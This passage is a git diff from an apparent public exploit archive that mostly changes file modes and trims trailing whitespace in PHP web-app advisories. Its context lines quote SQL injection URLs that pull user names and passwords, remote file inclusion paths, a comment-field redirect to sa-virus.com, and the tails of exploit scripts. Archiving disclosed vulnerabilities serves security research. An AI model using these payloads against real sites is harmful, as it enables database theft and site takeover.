of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/php/webapps/14393.txt b/platforms/php/webapps/14393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14394.txt b/platforms/php/webapps/14394.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14395.txt b/platforms/php/webapps/14395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14404.txt b/platforms/php/webapps/14404.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14405.txt b/platforms/php/webapps/14405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14410.txt b/platforms/php/webapps/14410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14415.html b/platforms/php/webapps/14415.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14423.txt b/platforms/php/webapps/14423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14425.txt b/platforms/php/webapps/14425.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14426.pl b/platforms/php/webapps/14426.pl index bfd7ef5e5..ef938a466 100755 --- a/platforms/php/webapps/14426.pl +++ b/platforms/php/webapps/14426.pl @@ -68,5 +68,4 @@ sub exploit () } #Exploit failed... print "- Exploit failed\n" -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/14430.txt b/platforms/php/webapps/14430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14432.txt b/platforms/php/webapps/14432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14434.txt b/platforms/php/webapps/14434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14435.txt b/platforms/php/webapps/14435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14436.txt b/platforms/php/webapps/14436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14437.txt b/platforms/php/webapps/14437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14438.txt b/platforms/php/webapps/14438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14439.txt b/platforms/php/webapps/14439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14440.txt b/platforms/php/webapps/14440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14441.txt b/platforms/php/webapps/14441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14442.txt b/platforms/php/webapps/14442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14443.txt b/platforms/php/webapps/14443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14444.txt b/platforms/php/webapps/14444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14445.txt b/platforms/php/webapps/14445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14446.txt b/platforms/php/webapps/14446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14448.txt b/platforms/php/webapps/14448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14449.txt b/platforms/php/webapps/14449.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14450.txt b/platforms/php/webapps/14450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14453.txt b/platforms/php/webapps/14453.txt old mode 100755 new mode 100644 index 72a3274a5..b429f3e6f --- a/platforms/php/webapps/14453.txt +++ b/platforms/php/webapps/14453.txt @@ -19,4 +19,4 @@ http://localhost/[path]/ecard.php?ecard=418337 (Sql) http://localhost/[path]/showphoto.php?photo=418337 (Sql) ######################################################################################## -Thanks : http://www.e-banka.org \ No newline at end of file +Thanks : http://www.e-banka.org \ No newline at end of file diff --git a/platforms/php/webapps/14454.txt b/platforms/php/webapps/14454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14455.txt b/platforms/php/webapps/14455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14457.txt b/platforms/php/webapps/14457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14458.txt b/platforms/php/webapps/14458.txt old mode 100755 new mode 100644 index 826cb61ea..53576102a --- a/platforms/php/webapps/14458.txt +++ b/platforms/php/webapps/14458.txt @@ -37,5 +37,4 @@ http://www.Victime.com/sNews/index.php?id= ==================================================== -Greetingz To SlaSSi & Xella - \ No newline at end of file +Greetingz To SlaSSi & Xella \ No newline at end of file diff --git a/platforms/php/webapps/14459.txt b/platforms/php/webapps/14459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14462.txt b/platforms/php/webapps/14462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14463.txt b/platforms/php/webapps/14463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14465.txt b/platforms/php/webapps/14465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14466.txt b/platforms/php/webapps/14466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14467.txt b/platforms/php/webapps/14467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14469.txt b/platforms/php/webapps/14469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14470.txt b/platforms/php/webapps/14470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14471.txt b/platforms/php/webapps/14471.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14472.txt b/platforms/php/webapps/14472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14474.txt b/platforms/php/webapps/14474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14476.txt b/platforms/php/webapps/14476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14481.txt b/platforms/php/webapps/14481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14485.txt b/platforms/php/webapps/14485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14488.txt b/platforms/php/webapps/14488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14490.txt b/platforms/php/webapps/14490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14494.txt b/platforms/php/webapps/14494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14495.txt b/platforms/php/webapps/14495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14499.txt b/platforms/php/webapps/14499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14500.txt b/platforms/php/webapps/14500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14501.txt b/platforms/php/webapps/14501.txt old mode 100755 new mode 100644 index 03592c370..51243c934 --- a/platforms/php/webapps/14501.txt +++ b/platforms/php/webapps/14501.txt @@ -36,4 +36,4 @@ index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1 # my friends # M4MIM4N // L363ND //Meher Assel // Ghost_tn //ta3lab el maker // Th3 m3t4l-m4n # -############################################################## \ No newline at end of file +############################################################## \ No newline at end of file diff --git a/platforms/php/webapps/14502.txt b/platforms/php/webapps/14502.txt old mode 100755 new mode 100644 index 615290f33..eb8a89b23 --- a/platforms/php/webapps/14502.txt +++ b/platforms/php/webapps/14502.txt @@ -19,6 +19,4 @@ http://www.site.com/path/index.php?option=com_beamospetition&startpage=3&pet=-1 +Union+select+user()+from+jos_users-- ############################################################ Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM" -############################################################ - - \ No newline at end of file +############################################################ \ No newline at end of file diff --git a/platforms/php/webapps/14512.txt b/platforms/php/webapps/14512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14518.txt b/platforms/php/webapps/14518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14523.txt b/platforms/php/webapps/14523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14528.txt b/platforms/php/webapps/14528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14530.txt b/platforms/php/webapps/14530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14531.pdf b/platforms/php/webapps/14531.pdf old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14534.txt b/platforms/php/webapps/14534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14541.txt b/platforms/php/webapps/14541.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14556.txt b/platforms/php/webapps/14556.txt old mode 100755 new mode 100644 index 5b011de58..7e23382f6 --- a/platforms/php/webapps/14556.txt +++ b/platforms/php/webapps/14556.txt @@ -19,5 +19,4 @@ SQL Error => www.site.com/modules/Partenaires/clic.php?id=8 [Blind] -#################################################################### - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/14557.txt b/platforms/php/webapps/14557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14558.txt b/platforms/php/webapps/14558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14559.txt b/platforms/php/webapps/14559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14560.txt b/platforms/php/webapps/14560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14562.html b/platforms/php/webapps/14562.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14563.html b/platforms/php/webapps/14563.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14564.html b/platforms/php/webapps/14564.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14565.html b/platforms/php/webapps/14565.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14569.txt b/platforms/php/webapps/14569.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1457.txt b/platforms/php/webapps/1457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14570.txt b/platforms/php/webapps/14570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14572.txt b/platforms/php/webapps/14572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14578.php b/platforms/php/webapps/14578.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14585.php b/platforms/php/webapps/14585.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14589.txt b/platforms/php/webapps/14589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14592.txt b/platforms/php/webapps/14592.txt old mode 100755 new mode 100644 index cb51d98b7..f864ba36b --- a/platforms/php/webapps/14592.txt +++ b/platforms/php/webapps/14592.txt @@ -21,6 +21,4 @@ http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT +Union+select+user()+from+jos_users-- ############################################################ #.Türk oğlu, !!..Türk kızı !!..Türklügünü Koru!.. -############################################################ - - \ No newline at end of file +############################################################ \ No newline at end of file diff --git a/platforms/php/webapps/14595.html b/platforms/php/webapps/14595.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14596.txt b/platforms/php/webapps/14596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14598.txt b/platforms/php/webapps/14598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14614.txt b/platforms/php/webapps/14614.txt old mode 100755 new mode 100644 index 10db9fcd7..49dc56af4 --- a/platforms/php/webapps/14614.txt +++ b/platforms/php/webapps/14614.txt @@ -9,4 +9,4 @@ C0nditi0ns : PHP Version > 4.x.x Expl0it Code : http://target/clearBudget.0.9.8/logic/controller.class.php?actionPath=[file] Ramadan Kareem ! -Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms & T3am \ No newline at end of file +Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms & T3am \ No newline at end of file diff --git a/platforms/php/webapps/14615.txt b/platforms/php/webapps/14615.txt old mode 100755 new mode 100644 index 5897dcbc0..57dee4bba --- a/platforms/php/webapps/14615.txt +++ b/platforms/php/webapps/14615.txt @@ -9,4 +9,4 @@ C0nditi0ns : PHP Version > 4.x.x Exploit Code : http://target/path/getid3/getid3.php?header=[file] Ramadan Kareem ! -Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms & T3am \ No newline at end of file +Gr33t'z : SA-h4x0r ~ LoOoRd ~ Inj3ct0r M3ms & T3am \ No newline at end of file diff --git a/platforms/php/webapps/14618.txt b/platforms/php/webapps/14618.txt old mode 100755 new mode 100644 index 1597862e5..ff8786243 --- a/platforms/php/webapps/14618.txt +++ b/platforms/php/webapps/14618.txt @@ -14,7 +14,4 @@ Exploit: http://target/SaurusCMSupdate4.7.0/saurus_cms_upd4.7.0/com_del.php?clas ____________________________________________ A special tribute to: -DannY.iRaQi - TeaM iRaQ HaCkers - - - \ No newline at end of file +DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/platforms/php/webapps/14622.txt b/platforms/php/webapps/14622.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14636.txt b/platforms/php/webapps/14636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14637.txt b/platforms/php/webapps/14637.txt old mode 100755 new mode 100644 index b23ef7587..c1b99327d --- a/platforms/php/webapps/14637.txt +++ b/platforms/php/webapps/14637.txt @@ -32,5 +32,4 @@ Column : 1064 http://127.0.0.1/path/video.php?id=-4444 union select swfurl 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from archive -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/php/webapps/14639.txt b/platforms/php/webapps/14639.txt old mode 100755 new mode 100644 index 5a6605bb7..9870df8cf --- a/platforms/php/webapps/14639.txt +++ b/platforms/php/webapps/14639.txt @@ -9,8 +9,4 @@  +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L]  +++++++++++++++++++++++++++++++++++++++++++++++++++++ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - - \ No newline at end of file +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/platforms/php/webapps/14640.txt b/platforms/php/webapps/14640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14643.txt b/platforms/php/webapps/14643.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14644.html b/platforms/php/webapps/14644.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14645.txt b/platforms/php/webapps/14645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14647.php b/platforms/php/webapps/14647.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14648.txt b/platforms/php/webapps/14648.txt old mode 100755 new mode 100644 index 57ce06c6f..818dba294 --- a/platforms/php/webapps/14648.txt +++ b/platforms/php/webapps/14648.txt @@ -32,4 +32,4 @@ Add A New Comment And The exploit is in Name :) -Thx To : Allah \ No newline at end of file +Thx To : Allah \ No newline at end of file diff --git a/platforms/php/webapps/14650.html b/platforms/php/webapps/14650.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14654.php b/platforms/php/webapps/14654.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14655.txt b/platforms/php/webapps/14655.txt old mode 100755 new mode 100644 index 520db0bba..5ebc2ea43 --- a/platforms/php/webapps/14655.txt +++ b/platforms/php/webapps/14655.txt @@ -23,5 +23,4 @@ http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&se Greetz @ MCA-CRB All "DZ" "MusliM" ############################################################ ======[saha fotorkom]====== -############################################################ - \ No newline at end of file +############################################################ \ No newline at end of file diff --git a/platforms/php/webapps/14656.txt b/platforms/php/webapps/14656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14659.txt b/platforms/php/webapps/14659.txt old mode 100755 new mode 100644 index aa5ef292a..18a019f1d --- a/platforms/php/webapps/14659.txt +++ b/platforms/php/webapps/14659.txt @@ -31,5 +31,4 @@ http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- ŞeHiT GeLdi ÖLümLü YaLan, GiTTi ÖLümSüzLügü GerÇek. Siz HaYaT SüRen LeşLer, SiZi Kim DiRiLTecek?.. =================================================== -Greetz : 1923Turk All Users - \ No newline at end of file +Greetz : 1923Turk All Users \ No newline at end of file diff --git a/platforms/php/webapps/1467.php b/platforms/php/webapps/1467.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14672.txt b/platforms/php/webapps/14672.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1468.php b/platforms/php/webapps/1468.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14684.php b/platforms/php/webapps/14684.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14686.txt b/platforms/php/webapps/14686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14694.txt b/platforms/php/webapps/14694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14702.txt b/platforms/php/webapps/14702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14703.txt b/platforms/php/webapps/14703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14707.txt b/platforms/php/webapps/14707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14712.txt b/platforms/php/webapps/14712.txt old mode 100755 new mode 100644 index 3c48fc2d9..bf976a690 --- a/platforms/php/webapps/14712.txt +++ b/platforms/php/webapps/14712.txt @@ -9,10 +9,4 @@  +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]  +++++++++++++++++++++++++++++++++++++++++++++++++++++ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - - - - \ No newline at end of file +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/platforms/php/webapps/14714.txt b/platforms/php/webapps/14714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14716.txt b/platforms/php/webapps/14716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14717.txt b/platforms/php/webapps/14717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14718.txt b/platforms/php/webapps/14718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14722.txt b/platforms/php/webapps/14722.txt old mode 100755 new mode 100644 index 4d0f57b9d..8afbe6da7 --- a/platforms/php/webapps/14722.txt +++ b/platforms/php/webapps/14722.txt @@ -60,6 +60,4 @@ Joomla! (Multiple) ExploiT # Thanks : milw0rm.com & exploit-db.com & offsec.com & inj3ct0r.com & www.hack0wn.com -exit ,, / Praise be to God for the blessing of Islam - - \ No newline at end of file +exit ,, / Praise be to God for the blessing of Islam \ No newline at end of file diff --git a/platforms/php/webapps/14737.txt b/platforms/php/webapps/14737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14742.txt b/platforms/php/webapps/14742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1478.php b/platforms/php/webapps/1478.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14799.txt b/platforms/php/webapps/14799.txt old mode 100755 new mode 100644 index e8fba6dfe..4ad24e780 --- a/platforms/php/webapps/14799.txt +++ b/platforms/php/webapps/14799.txt @@ -9,10 +9,4 @@  +++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]  +++++++++++++++++++++++++++++++++++++++++++++++++++++ -A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers - - - - - - \ No newline at end of file +A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers \ No newline at end of file diff --git a/platforms/php/webapps/14801.txt b/platforms/php/webapps/14801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14802.html b/platforms/php/webapps/14802.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14806.txt b/platforms/php/webapps/14806.txt old mode 100755 new mode 100644 index d0f2c5bdf..9f7afea64 --- a/platforms/php/webapps/14806.txt +++ b/platforms/php/webapps/14806.txt @@ -12,4 +12,4 @@ Prometeo (vers. 1.0.65) -SQLi Vulnerability- ========= -Example: http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users-- -# Netw0rkSecurity.net [2010-08-26] \ No newline at end of file +# Netw0rkSecurity.net [2010-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/14809.txt b/platforms/php/webapps/14809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14810.txt b/platforms/php/webapps/14810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14811.txt b/platforms/php/webapps/14811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14815.txt b/platforms/php/webapps/14815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14817.txt b/platforms/php/webapps/14817.txt old mode 100755 new mode 100644 index 4792b2b41..69a215834 --- a/platforms/php/webapps/14817.txt +++ b/platforms/php/webapps/14817.txt @@ -41,5 +41,4 @@ SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ===========================all my friend =================================== * PrX Hacker * Hacker Boy * AbUbAdR * mAsH3L ALLiL * DMaR AL-TMiMi | -* Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA | - \ No newline at end of file +* Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA | \ No newline at end of file diff --git a/platforms/php/webapps/14819.html b/platforms/php/webapps/14819.html old mode 100755 new mode 100644 index 56288d3d8..6425c405f --- a/platforms/php/webapps/14819.html +++ b/platforms/php/webapps/14819.html @@ -50,5 +50,4 @@ Email : R7e@HoTMaiL.coM</font></b></p> </center> -</html> - \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/1482.php b/platforms/php/webapps/1482.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14820.txt b/platforms/php/webapps/14820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14822.txt b/platforms/php/webapps/14822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14823.txt b/platforms/php/webapps/14823.txt old mode 100755 new mode 100644 index 1ca4e69a6..9402fc390 --- a/platforms/php/webapps/14823.txt +++ b/platforms/php/webapps/14823.txt @@ -34,5 +34,4 @@ SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited * Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA | -=========================| -=[ THE END]=- |========================= - \ No newline at end of file +=========================| -=[ THE END]=- |========================= \ No newline at end of file diff --git a/platforms/php/webapps/14826.txt b/platforms/php/webapps/14826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14827.py b/platforms/php/webapps/14827.py index 0f13ddd51..34b6528a0 100755 --- a/platforms/php/webapps/14827.py +++ b/platforms/php/webapps/14827.py @@ -77,8 +77,4 @@ if len(sys.argv) != 4: else: exploit(sys.argv[1], sys.argv[2], sys.argv[3]) -exit(0) - - - - \ No newline at end of file +exit(0) \ No newline at end of file diff --git a/platforms/php/webapps/14828.txt b/platforms/php/webapps/14828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14829.txt b/platforms/php/webapps/14829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14833.txt b/platforms/php/webapps/14833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14834.txt b/platforms/php/webapps/14834.txt old mode 100755 new mode 100644 index 6b5344836..ca2b19d60 --- a/platforms/php/webapps/14834.txt +++ b/platforms/php/webapps/14834.txt @@ -31,5 +31,4 @@ Add A New Comment And The exploit is in Name :) -Peace - \ No newline at end of file +Peace \ No newline at end of file diff --git a/platforms/php/webapps/14835.txt b/platforms/php/webapps/14835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14837.txt b/platforms/php/webapps/14837.txt old mode 100755 new mode 100644 index 66dac3787..c816e869a --- a/platforms/php/webapps/14837.txt +++ b/platforms/php/webapps/14837.txt @@ -25,6 +25,4 @@ http://localhost/cf_image_host_v1.3.81/inc/config.php?settings[SET_LANGUAGE]=[EV ======================================================================================================= Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz -Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE - - \ No newline at end of file +Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE \ No newline at end of file diff --git a/platforms/php/webapps/14838.txt b/platforms/php/webapps/14838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14839.txt b/platforms/php/webapps/14839.txt old mode 100755 new mode 100644 index c460281d9..7560dc159 --- a/platforms/php/webapps/14839.txt +++ b/platforms/php/webapps/14839.txt @@ -30,6 +30,4 @@ Put on the name & body of your comment any html code like: <meta http-equiv="refresh" content="0;url=http://sa-virus.com/" /> <==== ( thats redirecting to sa-virus.com ) [~] Another note : You can bypass the limit of comments per day in this guestbook script -By deleting the saved cookie in your computer ;) - - \ No newline at end of file +By deleting the saved cookie in your computer ;) \ No newline at end of file diff --git a/platforms/php/webapps/1484.php b/platforms/php/webapps/1484.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14841.txt b/platforms/php/webapps/14841.txt old mode 100755 new mode 100644 index 62fac33e9..95ecc68cf --- a/platforms/php/webapps/14841.txt +++ b/platforms/php/webapps/14841.txt @@ -29,6 +29,4 @@ http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L] ======================================================================================================= Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz -Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE - - \ No newline at end of file +Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE \ No newline at end of file diff --git a/platforms/php/webapps/14845.txt b/platforms/php/webapps/14845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14846.txt b/platforms/php/webapps/14846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14848.txt b/platforms/php/webapps/14848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14849.py b/platforms/php/webapps/14849.py index 6d41f3f90..9c61443d9 100755 --- a/platforms/php/webapps/14849.py +++ b/platforms/php/webapps/14849.py @@ -78,7 +78,4 @@ if len(sys.argv) != 3: else: exploit(sys.argv[1], sys.argv[2]) -exit(0) - - - \ No newline at end of file +exit(0) \ No newline at end of file diff --git a/platforms/php/webapps/1485.php b/platforms/php/webapps/1485.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14851.txt b/platforms/php/webapps/14851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14860.txt b/platforms/php/webapps/14860.txt old mode 100755 new mode 100644 index e288cf02f..f1e59d853 --- a/platforms/php/webapps/14860.txt +++ b/platforms/php/webapps/14860.txt @@ -14,5 +14,4 @@ http://www.site.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sb [#] Greetings: -[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ... - \ No newline at end of file +[Dr.2] , [darkc0de team] , [AsbMay's Group] , n all ... \ No newline at end of file diff --git a/platforms/php/webapps/14867.txt b/platforms/php/webapps/14867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14876.txt b/platforms/php/webapps/14876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14884.txt b/platforms/php/webapps/14884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14887.txt b/platforms/php/webapps/14887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14890.py b/platforms/php/webapps/14890.py index 9f07a3a50..218f5d0a4 100755 --- a/platforms/php/webapps/14890.py +++ b/platforms/php/webapps/14890.py @@ -101,4 +101,4 @@ print('+------------------------------------------------------------------------ if len(sys.argv) != 4: usage(sys.argv[0]) else: - exploit(sys.argv[1],sys.argv[2], sys.argv[3]) \ No newline at end of file + exploit(sys.argv[1],sys.argv[2], sys.argv[3]) \ No newline at end of file diff --git a/platforms/php/webapps/14891.txt b/platforms/php/webapps/14891.txt old mode 100755 new mode 100644 index a1fc3a456..487f973ba --- a/platforms/php/webapps/14891.txt +++ b/platforms/php/webapps/14891.txt @@ -14,5 +14,4 @@ http://www.example.com/classi/detail.php?sid=80 and 1=2-- // False ,, [~] Greetings: -string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends"); - \ No newline at end of file +string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends"); \ No newline at end of file diff --git a/platforms/php/webapps/14893.txt b/platforms/php/webapps/14893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/14894.py b/platforms/php/webapps/14894.py index e08558083..3689daeff 100755 --- a/platforms/php/webapps/14894.py +++ b/platforms/php/webapps/14894.py @@ -110,6 +110,4 @@ if len(sys.argv) != 3: else: exploit(sys.argv[1], sys.argv[2]) -exit(0) - - \ No newline at end of file +exit(0) \ No newline at end of file diff --git a/platforms/php/webapps/14896.txt b/platforms/php/webapps/14896.txt old mode 100755 new mode 100644 index d8b2cfb40..896ca888d --- a/platforms/php/webapps/14896.txt +++ b/platforms/php/webapps/14896.txt @@ -9,10 +9,4 @@ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Exploit: 